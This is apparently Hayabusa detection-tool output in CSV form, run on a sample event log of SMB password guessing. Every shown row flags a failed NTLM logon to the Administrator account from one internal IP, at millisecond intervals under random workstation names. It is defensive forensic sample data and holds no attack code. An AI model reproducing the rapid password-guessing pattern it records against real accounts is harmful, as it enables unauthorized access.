01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.336 